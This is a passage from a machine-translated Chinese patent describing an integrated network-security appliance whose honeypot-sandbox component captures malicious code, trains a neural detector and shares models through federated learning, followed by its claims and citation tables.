s20524: if the number of the infected devices exceeds the set threshold or the number of abnormal traffic sent to the outside by the internal devices exceeds the set threshold, the security component disconnects itself from the external network to perform self-isolation, reducing the risk of threat continuing to spread to the outside, and simultaneously enables a standby communication interface, which allows the user to remotely access or access in emergency to the integrated machine and operate the integrated machine, to send logs and captured malicious communication to the user and the equipment manufacturer server.
The backup communication interface is a designated TCP/UDP port that is externally opened by the routing component, the port number being designated by the manufacturer.
That is, normally, the available ports of the route are between TCP/UDP 1-65535, and when the standby port is started, the rest ports are closed except the TCP/UDP port number corresponding to the standby port.
The step of inducing communication to the honeypot sandbox linkage assembly is as follows:
step a1: the security component initiates connection dismantling or communication suspension operation to the communication source end;
step a2: the security component initiates connection removal (connection reset) operation to the communication destination terminal and re-initiates new communication to the communication destination terminal; if the communication destination terminal does not perform the connection resetting operation, the communication destination terminal loses the packet and waits for the connection timeout of the communication destination terminal to actively initiate a new connection (if the opposite terminal initiates the connection);
step a3: the safety component informs the honey-comb sandbox linkage component of communication information, and the honey-comb sandbox linkage component responds to communication connection on the basis that the safety component initiates connection; if the connection is received within the set time period, the induced interaction is attempted to be carried out on the communication, otherwise, the communication request is actively attempted for a plurality of times.
Further, the step S206: in the process of interaction and sample capturing of the honeypot sandbox linkage assembly, the honeypot sandbox linkage assembly transmits traffic after analysis of the sandbox to the internet of things gateway assembly for processing, and returns the processed returned information of the internet of things gateway assembly to an attacker; the method specifically comprises the following steps:
s2061: the honeypot sandbox linkage component receives suspicious or malicious communication actively hitting the DMZ zone and induced by the security component;
s2062: the honey pot creates corresponding examples, registers in the honey pot sandbox linkage component, updates the NAT forwarding table and the session mapping table when related external network communication, and updates and maintains the inter-component communication mapping table and the session mapping table when related internal network communication.
S2063: for the communication capable of interacting with the honey tank sandbox linkage assembly, the honey tank sandbox linkage assembly uses a set communication protocol according to the situation, so that a sandbox in the honey tank sandbox linkage assembly directly accesses real Internet of things equipment in the Internet of things gateway assembly;
s2064: under the supervision of a safety component, a set communication protocol is used for sending part of commands executed in the honeypot to a sandbox for pre-analysis after being processed so as to eliminate potential safety hazards;
S2065: the command which is subjected to the sandbox auxiliary test is sent to the real Internet of things equipment and waits for the response of the real Internet of things equipment, and the response is taken as the response of the honeypot; the honeypot sandbox linkage assembly selects a plurality of devices among the plurality of devices of the Internet of things to assist the operation of the devices according to the communication protocol condition, the interaction condition and the performance condition.
S2066: and the honeypot sandbox linkage component performs data desensitization, data confusion and replacement operation on information returned by the real Internet of things equipment of the Internet of things, and finally returns to a value communication opposite end.
Further, the step S2062 further includes: relevant records are made in the communication mapping table and the session mapping table to prevent conflicts with normal communication. Meanwhile, if collision is generated between the communication system and the normal communication, various relevant mapping parameters and analysis parameters are actively adjusted on the basis of ensuring normal communication to be performed normally; if the adjustment still conflicts (i.e. the normal communication is not influenced), the interaction attempt is actively abandoned, and the relevant interaction is continued after the subsequent resource release is waited (if the destination terminal can still correspond).
Illustratively, the S2064: under the supervision of a safety component, a set communication protocol is used for sending part of commands executed in the honeypot to a sandbox for pre-analysis after being processed so as to eliminate potential safety hazards; the method specifically comprises the following steps:
All write operations and script, executable files or program execution operations will be identified and blocked to prevent penetration into the user's real internet of things device.
Further, the step S207: the honeypot sandbox linkage component analyzes the captured malicious codes, and trains the convolutional neural network by taking the software behaviors and the network behaviors as the labels of the malicious codes after extracting the software behaviors and the network behaviors; the method specifically comprises the following steps:
s2071: after the honey pot sand box linkage component captures malicious codes, the honey pot sand box linkage component directly passes through a sand box for analysis operation;
s2072: starting an analysis process by the sandbox, and analyzing a system level and a network level for malicious codes;
s2073: data desensitization is carried out on the data after the feature extraction operation is completed, meanwhile, privacy inspection is carried out on the desensitized data through a data set component in the honeypot sandbox linkage component, and the data which cannot be desensitized can be used after confusion operation is carried out on the data;
s2074: training a machine learning model by using desensitization data;
s2075: the federal learning network server of the all-in-one machine manufacturer checks the trained machine learning models transmitted by all the all-in-one machines by using known and definite malicious flow, comprehensively compares different machine learning models and sets corresponding weights;
S2076: the federal learning network server of the all-in-one machine manufacturer initiates a blockchain uplink, and the parameters related to the model ID, the weight, the parameters, the submitter and the like are subjected to uplink operation under the fairness of most of the online all-in-one machines;
s2077: after the uplink operation is completed, the machine learning model is fused according to the block information by adopting the federal learning technology, and then the access is opened.
Further, the S2072: starting an analysis process by the sandbox, and analyzing a system level and a network level for malicious codes; the method specifically comprises the following steps:
at the system level, analyzing the information related to the system level and software such as IO operation, system stack call, memory use, file release, API call and the like of malicious codes, and generating an analysis report. Triggering as many malicious code execution paths as possible by using a stain analysis mode in the analysis process, acquiring more comprehensive system level information, and triggering more network behaviors;
at the network level, various parameters of network interactions are analyzed, and at the end, the generated network traffic is packetized, and the data set component extracts features using feature engineering.
Further, the S2074: training a machine learning model by using desensitization data; the method specifically comprises the following steps:
Constructing a training set; the training set is the network traffic of known malicious codes or non-malicious code labels;
constructing a machine learning model; the machine learning model is a convolutional neural network;
and inputting the training set into a machine learning model, and training the model to obtain a trained machine learning model.
Further, the S2074: training a machine learning model by using desensitization data; the method specifically comprises the following steps:
in the training process, the training is carried out by using the all-in-one machine or the cloud according to the configuration decision,
if the integrated machine is used for training, the integrated machine performs equipment performance planning, and equipment performance which can be used for normal network requirements of a user is reserved, so that the redundant performance is used or the whole equipment performance is used for local model training when the network load is low at night;
if cloud training is used, encryption keys distributed by equipment manufacturers for users are used for encrypting the desensitized data, the desensitized data are sent to a cloud server of the equipment manufacturers in a mode of calculation power outsourcing for model training, the trained data are also used for encrypting the model by the keys, and then the model is returned to the users; after the user obtains the data, the cloud server destroys all user data immediately and destroys the secret key so as to ensure the data security, and then the machine learning model is sent to the federal learning network of the all-in-one manufacturer for model fusion.
Further, the step S208: the safety component is used for checking and accepting the trained convolutional neural network and checking and monitoring communication passing through the integrated machine through the trained convolutional neural network; the method specifically comprises the following steps:
s2081: the security component periodically checks and upgrades the rule base and the machine learning model;
s2082: deploying the rule base and the machine learning model in an integrated machine;
s2083: and the rule base and the machine learning model which are deployed are completed to perform normal operation in the integrated machine so as to identify abnormal communication.
Further, the S2081: the security component periodically checks and upgrades the rule base and the machine learning model; the method specifically comprises the following steps:
for the rule base, checking is assisted by using a check code and a version number provided by an integrated machine manufacturer;
for machine learning models, the blockchain information stored on the all-in-one machine is used for checking and validation.
Further, the S2082: deploying the rule base and the machine learning model in an integrated machine; the method specifically comprises the following steps: when confirming that the rule is correct, downloading the latest rule base and updating the local rule base;
downloading the machine learning model and simultaneously locally deploying the machine learning model;
The malicious traffic stored before being used for detection during deployment:
if the detection fails, reporting the machine learning model and the test data;
if the detection is successful, the latest machine learning model is deployed while keeping the latest versions of the machine learning model backed up (machine learning models beyond a certain point in time will be removed to free up resources);
and if the newly deployed machine learning model influences the user experience, recovering the old version machine learning model, and simultaneously reporting the corresponding machine learning model version to the federal learning network of the manufacturer.
Federal learning is a machine learning technique that fuses the models of everything into one large model and then distributes it again, while preserving privacy.
Federal learning typically requires data related to model fusion via network transmission, where a "vendor federal learning network" is a network built by equipment vendors based on federal learning technology architecture.
The above description is only of the preferred embodiments of the present invention and is not intended to limit the present invention, but various modifications and variations can be made to the present invention by those skilled in the art. Any modification, equivalent replacement, improvement, etc. made within the spirit and principle of the present invention should be included in the protection scope of the present invention.
Claims (9)
1. The working method of the network communication and safety control integrated machine is characterized by comprising the following steps of:
the logic framework module of the all-in-one machine is in communication connection with the safety component, the user equipment component, the routing component, the Internet of things related component and the honeypot sandbox linkage component to coordinate the working modes of the components;
the local verification component of the all-in-one machine receives data flowing into and flowing out of the all-in-one machine and forwards the data to the safety component, the safety component analyzes and processes the data, and then the routing component forwards the data;
the internet of things gateway component of the all-in-one machine is in network communication with the user equipment component;
the honeypot sandbox linkage assembly is exposed to an external network on the routing assembly, and the honeypot monitors a communication interface and captures malicious codes;
according to the analysis result of the safety component, interacting the malicious code with the honeypot sandbox linkage component;
in the process of interaction and sample capturing of the honeypot sandbox linkage assembly, the honeypot sandbox linkage assembly transmits traffic after analysis of the sandbox to the internet of things gateway assembly for processing, and returns the processed returned information of the internet of things gateway assembly to an attacker;
the honeypot sandbox linkage component analyzes the captured malicious codes, and trains the convolutional neural network by taking the software behaviors and the network behaviors as the labels of the malicious codes after extracting the software behaviors and the network behaviors;
The safety component is used for checking and accepting the trained convolutional neural network and checking and monitoring communication passing through the integrated machine through the trained convolutional neural network;
the honeypot sandbox linkage component analyzes the captured malicious codes, and trains the convolutional neural network by taking the software behaviors and the network behaviors as the labels of the malicious codes after extracting the software behaviors and the network behaviors; the method specifically comprises the following steps:
after the honey pot sand box linkage component captures malicious codes, the honey pot sand box linkage component directly passes through a sand box for analysis operation;
starting an analysis process by the sandbox, and analyzing a system level and a network level for malicious codes;
data desensitization is carried out on the data after the feature extraction operation is completed, meanwhile, privacy inspection is carried out on the desensitized data through a data set component in the honeypot sandbox linkage component, and the data which cannot be desensitized can be used after confusion operation is carried out on the data;
training a machine learning model by using desensitization data;
the federal learning network server of the all-in-one machine manufacturer checks the trained machine learning models transmitted by all the all-in-one machines by using known and definite malicious flow, comprehensively compares different machine learning models and sets corresponding weights;
The federal learning network server of the all-in-one machine manufacturer initiates a blockchain uplink, and performs uplink operation on related model IDs, weights, parameters and submitters under notarization of most of the online all-in-one machines;
after the uplink operation is completed, the machine learning model is fused according to the block information by adopting the federal learning technology, and then the access is opened.
2. The method for operating a network communication and security management and control integrated machine according to claim 1, wherein a logic framework module of the integrated machine is in communication connection with a security component, a user equipment component, a routing component, an internet of things related component and a honeypot sandbox linkage component to coordinate the working modes of the components; the method specifically comprises the following steps:
the logic framework module of the all-in-one machine is in communication connection with the safety component, the user equipment component, the routing component, the Internet of things gateway component and the honeypot sandbox linkage component;
the security component is in butt joint with the routing component;
the security component is in butt joint with the Internet of things related component and the user equipment component;
the honey tank sandbox linkage assembly is in butt joint with the safety assembly and the Internet of things gateway assembly;
the Internet of things gateway component and the user equipment component are in butt joint with the routing component in terms of network communication;
After the integrated machine acquires the rule information, the local verification component is used for carrying out integrity verification on the rule information; and checking the current machine learning model version and iteration condition by using the model iteration blockchain information in the federal learning network.
3. The method of claim 1, wherein the local verification component of the all-in-one receives data flowing into and out of the all-in-one and forwards the data to the security component, the security component analyzes and processes the data, and the routing component forwards the data; the method specifically comprises the following steps:
checking whether the communication is in a security event cache table, if so, processing according to the operation in the security event cache table;
processing a data packet in communication, respectively extracting header information and application layer data of a data link layer, a network layer and a transmission layer, and comparing the header information by using rules stored in a rule base; matching the extracted data with the contents in the rule base piece by piece and matching the extracted data piece by piece, if the extracted data accords with the contents described in the rule base, if the extracted data is hit, continuing to match downwards;
performing application layer content inspection on the data packet passing the rule base inspection; ignoring the ciphertext, and matching rules of the plaintext data of the application layer of the rule base with the plaintext; wherein the application layer content comprises: an application layer protocol and content transmitted by the application layer;
The method comprises the steps of performing proportional dense sampling operation and logging on a communication process by using Netflow, checking communication sampling data by using a machine learning model in a safety component, and checking a sampling log by using a log checking mode;
when the security component encounters an abnormal condition or security event, a security event cache table in the security component is updated.
4. The method for operating a network communication and security management and control integrated machine according to claim 1, wherein an internet of things gateway component of the integrated machine performs network communication with a user equipment component; the method specifically comprises the following steps:
dividing the equipment in the gateway of the Internet of things into a plurality of equipment groups according to the equipment types and actions, and not checking the communication of the equipment in the equipment groups;
when the safety component checks the communication, firstly extracting the communication information and matching the safety event cache table, and if the communication information hits an item in the table, directly executing according to the operation recorded in the table, so that the follow-up check is skipped to improve the performance of the safety component;
when communication is carried out among different equipment groups in the gateway component of the Internet of things, the communication firstly passes through the gateway component of the Internet of things, the gateway component of the Internet of things only carries out sparse sampling record on the communication and carries out communication log inspection by using the security component, no additional security inspection is carried out, and communication limitation is carried out on equipment with abnormal log inspection and report is carried out;
The equipment in the user equipment group does not use grouping management, when the user equipment initiates access to the user equipment assembly, interaction among each equipment passes through the user equipment assembly, sparse sampling is conducted on communication by combining with the security assembly, communication log inspection is conducted, additional security inspection is not conducted, communication limitation is conducted on equipment with abnormal log inspection, and reporting is conducted;
the communication process between the Internet of things gateway component and the user equipment component is maintained by using an inter-component communication mapping table, all transverse communication among the components is recorded in the inter-component communication mapping table, meanwhile, the aging time is set to be the protocol communication time plus t minutes under the default condition, and entries exceeding the aging time are removed from the table;
under the default condition, the security level of the gateway component of the Internet of things is higher than that of the user equipment component, when the Internet of things equipment initiates interaction to the user equipment component, communication is only subjected to sparse sampling and checked by using a machine learning model, abnormal communication is blocked and reported, and corresponding equipment communication is limited; when the user equipment component initiates interaction to the Internet of things gateway component, densely sampling communication, checking by using a machine learning model, blocking abnormal communication, blocking related equipment and reporting;
When the security component encounters an abnormal condition or security event, a security event cache table in the security component is updated.
5. The method of claim 1, wherein the honeypot sandbox linkage assembly is exposed to an external network on the routing assembly, and the honeypot listens for a communication interface and captures malicious code; the method specifically comprises the following steps:
all communication of the honeypot sandbox linkage assembly is realized through a routing assembly, and the routing assembly exposes the honeypot sandbox linkage assembly to an external network in a DMZ (digital media player) mode;
carrying out security policy configuration on a DMZ area where the honey pot sandbox linkage assembly is located in the security assembly;
the honeypot sandbox linkage component applies for and requires the routing component to open a monitoring interface in a low-priority mode, and captures malicious codes by using the monitoring interface;
the method comprises the steps that safety strategy configuration is conducted on a DMZ area where a honey pot sandbox linkage assembly is located in a safety assembly; the method specifically comprises the following steps:
configuring the DMZ zone does not allow active access to any other component using a non-proprietary protocol, and the honeypot sandboxed linked component in the DMZ zone does not allow any information to be passed out to other components using a non-proprietary protocol; the special protocol refers to an end-to-end tunneling protocol, which is designed and implemented by equipment manufacturers;
Configuring the user equipment component and the internet of things related component not to allow the DMZ zone to be actively accessed in any way and with any protocol;
the DMZ area is configured to actively initiate communication to the Internet of things gateway component by using a special protocol, and the communication is controlled by the honeypot sandbox linkage component and registered with the security component; the security component adds the device which is communicated with the DMZ zone into the DMZ communication group, reduces the security level of the device which is communicated with the DMZ zone to the minimum, and strictly limits the communication between the DMZ communication group and other components or devices;
the honeypot sandbox linkage component applies for and requires the routing component to open a monitoring interface in a low-priority mode, and captures malicious codes by using the monitoring interface; the method specifically comprises the following steps:
the routing component maps and exposes all transmission layer ports of the routing component with low priority, and registers and marks in the NAT forwarding table;
when the internal network initiates communication to the external network, the routing component checks whether the current communication appears in the NAT forwarding table, if so, forwarding is carried out according to the NAT forwarding table, otherwise, the low-priority port mapping entry of the corresponding port is cancelled and the current communication mapping is added;
when receiving the communication of the external network, the routing component firstly checks whether a corresponding entry exists in the NAT forwarding table, if so, forwarding is carried out according to the NAT forwarding table, otherwise, low-priority port mapping is matched, and the current communication is transmitted to the honeypot sandbox linkage component in the DMZ area for processing;
When the normal priority mapping passes the aging time of the NAT forwarding table and no subsequent communication is performed, deleting the normal priority mapping from the NAT forwarding table and automatically converting the normal priority mapping into a low priority port mapping; the low priority port mapping is not affected by the NAT forwarding table aging mechanism, and the existence time is positive infinity.
6. The method for operating a network communication and security management and control integrated machine according to claim 1, wherein malicious codes are interacted with a honeypot sandbox linkage assembly according to an analysis result of a security assembly; the method specifically comprises the following steps:
for the checked traffic, maintaining a session mapping table and forwarding continuously by the routing component;
for the traffic which does not pass the inspection and is explicitly marked as malicious, immediately taking measures and inducing communication to the honeypot sandbox linkage assembly;
for traffic which does not pass the inspection but cannot be clearly malicious, blocking and recording in a security event cache table, and simultaneously inducing communication to a honeypot sandbox linkage assembly to achieve the purposes of attracting and holding down attacks, if the previous analysis result can be eliminated after the detection, marking the traffic in the security event cache table, simultaneously removing the communication restriction, and closely monitoring and tracking the marked traffic for a period of time, and blocking in time once high-risk network communication or communication with sensitive equipment and resources is discovered;
For traffic that does not pass the inspection and is explicitly marked as malicious, immediately taking measures and inducing the communication to the honeypot sandbox linkage assembly; the method specifically comprises the following steps:
when malicious communication is found in communication of an incoming network, the security component informs the honeypot sandbox linkage component of preparing to take over the malicious communication and monitoring the malicious communication, simultaneously immediately blocks communication with internal equipment, and adds an entry in a security event cache table in the security component for recording the inspection result;
if the malicious code is captured, the malicious code sample is sent to a sandbox for analysis, and meanwhile, a threat is reported to a user; if the malicious codes are not captured, recording an interaction process, desensitizing the data related to privacy and reporting current interaction information to a manufacturer server, and simultaneously notifying a user of the threat discovery;
when the internal equipment is found to send abnormal traffic to the outside in the communication of the outgoing network, a notice or an alarm is sent to a user, if high-risk behaviors or network communication are found, the communication is blocked, and meanwhile, communication isolation is carried out on the related equipment, so that malicious threats in the communication isolation equipment are difficult to spread to other equipment and alarm to the user;
If the number of the infected devices exceeds the set threshold or the number of abnormal traffic sent to the outside by the internal devices exceeds the set threshold, the security component disconnects itself from the external network to perform self-isolation, reducing the risk of threat continuing to spread to the outside, and simultaneously enables a standby communication interface, which allows the user to remotely access or access in emergency to the integrated machine and operate the integrated machine, to send logs and captured malicious communication to the user and the equipment manufacturer server.
7. The working method of the network communication and safety control integrated machine according to claim 1, wherein in the process of interaction and sample capturing of the honeypot sandbox linkage assembly, the honeypot sandbox linkage assembly transmits traffic after analysis of a sandbox to the internet of things gateway assembly for processing, and returns the processed returned information of the internet of things gateway assembly to an attacker; the method specifically comprises the following steps:
the honeypot sandbox linkage component receives suspicious or malicious communication actively hitting the DMZ zone and induced by the security component;
the honey pot creates a corresponding instance, registers in the honey pot sandbox linkage component, updates the NAT forwarding table and the session mapping table when related external network communication, and updates and maintains the inter-component communication mapping table and the session mapping table when related internal network communication;
For the communication capable of interacting with the honey tank sandbox linkage assembly, the honey tank sandbox linkage assembly uses a set communication protocol according to the situation, so that a sandbox in the honey tank sandbox linkage assembly directly accesses real Internet of things equipment in the Internet of things gateway assembly;
under the supervision of a safety component, a set communication protocol is used for sending part of commands executed in the honeypot to a sandbox for pre-analysis after being processed so as to eliminate potential safety hazards;
the command which is subjected to the sandbox auxiliary test is sent to the real Internet of things equipment and waits for the response of the real Internet of things equipment, and the response is taken as the response of the honeypot; the honey tank sandbox linkage assembly selects a plurality of devices among the plurality of devices of the Internet of things to assist the operation of the devices according to the communication protocol condition, the interaction condition and the performance condition;
and the honeypot sandbox linkage component performs data desensitization, data confusion and replacement operation on information returned by the real Internet of things equipment of the Internet of things, and finally returns to a value communication opposite end.
8. The method of claim 1, wherein the security component checks and accepts the trained convolutional neural network and checks and monitors communications through the integrated machine via the trained convolutional neural network; the method specifically comprises the following steps:
The security component periodically checks and upgrades the rule base and the machine learning model;
deploying the rule base and the machine learning model in an integrated machine;
and the rule base and the machine learning model which are deployed are completed to perform normal operation in the integrated machine so as to identify abnormal communication.
9. Network communication and security management integrated machine employing the working method according to any one of claims 1 to 8, characterized by comprising: a local verification component;
the local verification component is connected with the safety component;
the safety component is connected with the logic framework module;
the logic frame module is respectively connected with the user equipment component, the routing component, the Internet of things gateway component and the honeypot sandbox linkage component;
the safety component is respectively connected with the user equipment component, the routing component, the Internet of things gateway component and the honey tank sandbox linkage component;
the honeypot sandbox linkage assembly is connected with the honeypot, the sandbox and the data set assembly;
the user equipment component is in network communication with the routing component;
the routing component is in network communication with the Internet of things related component;
the Internet of things gateway component is connected with the honeypot sandbox linkage component.
Priority Applications (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN202210499337.6A CN115189905B (en) | 2022-05-09 | 2022-05-09 | Network communication and safety control integrated machine and working method thereof |
Applications Claiming Priority (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN202210499337.6A CN115189905B (en) | 2022-05-09 | 2022-05-09 | Network communication and safety control integrated machine and working method thereof |
Publications (2)
| Publication Number | Publication Date |
|---|---|
| CN115189905A CN115189905A (en) | 2022-10-14 |
| CN115189905B true CN115189905B (en) | 2023-05-23 |
Family
ID=83513085
Family Applications (1)
| Application Number | Title | Priority Date | Filing Date |
|---|---|---|---|
| CN202210499337.6A Active CN115189905B (en) | 2022-05-09 | 2022-05-09 | Network communication and safety control integrated machine and working method thereof |
Country Status (1)
| Country | Link |
|---|---|
| CN (1) | CN115189905B (en) |
Citations (4)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN102088379A (en) * | 2011-01-24 | 2011-06-08 | 国家计算机网络与信息安全管理中心 | Detecting method and device of client honeypot webpage malicious code based on sandboxing technology |
| CN108460277A (en) * | 2018-02-10 | 2018-08-28 | 北京工业大学 | A kind of automation malicious code mutation detection method |
| CN111651757A (en) * | 2020-06-05 | 2020-09-11 | 深圳前海微众银行股份有限公司 | Attack behavior monitoring method, device, equipment and storage medium |
| CN113794675A (en) * | 2021-07-14 | 2021-12-14 | 中国人民解放军战略支援部队信息工程大学 | Distributed Internet of things intrusion detection method and system based on block chain and federal learning |
Family Cites Families (1)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| US11620481B2 (en) * | 2020-02-26 | 2023-04-04 | International Business Machines Corporation | Dynamic machine learning model selection |
-
2022
- 2022-05-09 CN CN202210499337.6A patent/CN115189905B/en active Active
Patent Citations (4)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN102088379A (en) * | 2011-01-24 | 2011-06-08 | 国家计算机网络与信息安全管理中心 | Detecting method and device of client honeypot webpage malicious code based on sandboxing technology |
| CN108460277A (en) * | 2018-02-10 | 2018-08-28 | 北京工业大学 | A kind of automation malicious code mutation detection method |
| CN111651757A (en) * | 2020-06-05 | 2020-09-11 | 深圳前海微众银行股份有限公司 | Attack behavior monitoring method, device, equipment and storage medium |
| CN113794675A (en) * | 2021-07-14 | 2021-12-14 | 中国人民解放军战略支援部队信息工程大学 | Distributed Internet of things intrusion detection method and system based on block chain and federal learning |
Also Published As
| Publication number | Publication date |
|---|---|
| CN115189905A (en) | 2022-10-14 |
Similar Documents
| Publication | Publication Date | Title |
|---|---|---|
| Alsmadi et al. | Security of software defined networks: A survey | |
| Schnackengerg et al. | Cooperative intrusion traceback and response architecture (CITRA) | |
| US9954873B2 (en) | Mobile device-based intrusion prevention system | |
| KR101070614B1 (en) | Malicious traffic isolation system using botnet infomation and malicious traffic isolation method using botnet infomation | |
| US7646728B2 (en) | Network monitoring and intellectual property protection device, system and method | |
| US7463593B2 (en) | Network host isolation tool | |
| KR101692155B1 (en) | Method, apparatus and computer program for analzing vulnerability of software defined network | |
| US11546295B2 (en) | Industrial control system firewall module | |
| KR20060013491A (en) | Network attack signature generation | |
| CN111314276A (en) | Method, device and system for detecting multiple attack behaviors | |
| CN106789865B (en) | Network security protection method based on GRE network combined with SDN technology and honeypot technology | |
| JP6078179B1 (en) | Security threat detection system, security threat detection method, and security threat detection program | |
| CN116055254A (en) | Safe and trusted gateway system, control method, medium, equipment and terminal | |
| US20230115046A1 (en) | Network security system for preventing unknown network attacks | |
| La et al. | A novel monitoring solution for 6LoWPAN-based Wireless Sensor Networks | |
| Carcano et al. | Scada malware, a proof of concept | |
| CN115189905B (en) | Network communication and safety control integrated machine and working method thereof | |
| Lin et al. | Setting malicious flow entries against SDN operations: attacks and countermeasures | |
| JP3790486B2 (en) | Packet relay device, packet relay system, and story guidance system | |
| US20240114052A1 (en) | Network security system for preventing spoofed ip attacks | |
| Jadhav et al. | Detection and mitigation of ARP spoofing attack | |
| Prabhu et al. | Network intrusion detection system | |
| Pandey et al. | Taxonomy of DDoS attacks and their defense mechanisms in IoT | |
| Mihanjo et al. | Isolation of DDoS Attacks and Flash Events in Internet Traffic Using Deep Learning Techniques | |
| CN115051851B (en) | User access behavior management and control system and method in scene of internet of things |
Legal Events
| Date | Code | Title | Description |
|---|---|---|---|
| PB01 | Publication | ||
| PB01 | Publication | ||
| SE01 | Entry into force of request for substantive examination | ||
| SE01 | Entry into force of request for substantive examination | ||
| GR01 | Patent grant | ||
| GR01 | Patent grant |